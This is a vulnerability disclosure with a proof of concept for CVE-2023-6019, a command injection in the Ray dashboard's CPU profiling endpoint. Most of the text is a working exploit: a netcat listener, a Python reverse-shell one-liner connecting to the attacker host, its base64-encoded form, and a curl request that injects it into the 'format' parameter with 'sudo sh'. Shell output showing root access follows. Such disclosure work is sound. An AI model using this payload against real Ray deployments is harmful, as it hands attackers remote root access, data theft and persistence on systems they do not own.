ray-project/ray dashboard 命令注入漏洞（CVE-2023-6019）

Description =========== The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned: Proof of Concept ================ For this proof of concept, the attacker machine is `192.168.200.177` and the victim Ray dashboard is `192.168.200.204`. **Victim Ray dashboard `ray_dashboard.py` (`192.168.200.204`)** --------------------------------------------------------------- #!/usr/bin/env python3 import ray context = ray.init(dashboard_host="0.0.0.0") print(context.dashboard_url) and run like so: python3 -i ray_dashboard.py **Attacker machine (`192.168.200.177`)** ---------------------------------------- user@attacker:~$ nc -lvvp 4444 & Listening on 0.0.0.0 4444 # python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.177",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' == cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn user@attacker:~$ curl 'http://192.168.200.204:8265/worker/cpu_profile?pid=3354&ip=192.168.200.204&duration=5&native=0&format=`echo%20cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn|base64$IFS-d|sudo%20sh`' Connection received on 192.168.200.204 57436 # id uid=0(root) gid=0(root) groups=0(root) # whoami root # hostname ray Impact ====== Exploiting this vulnerability allows for a complete remote compromise of the system running the Ray dashboard, including model theft & alteration, total data compromise, and persistent access to an attacker. Ray has specific setup cases for setup with a passwordless sudo, giving the attacker root access. If Ray is not configured for passwordless sudo, the attacker will receive access in the same account the dashboard was run. Both allow for model model theft & alteration, total data compromise, and persistent access to an attacker.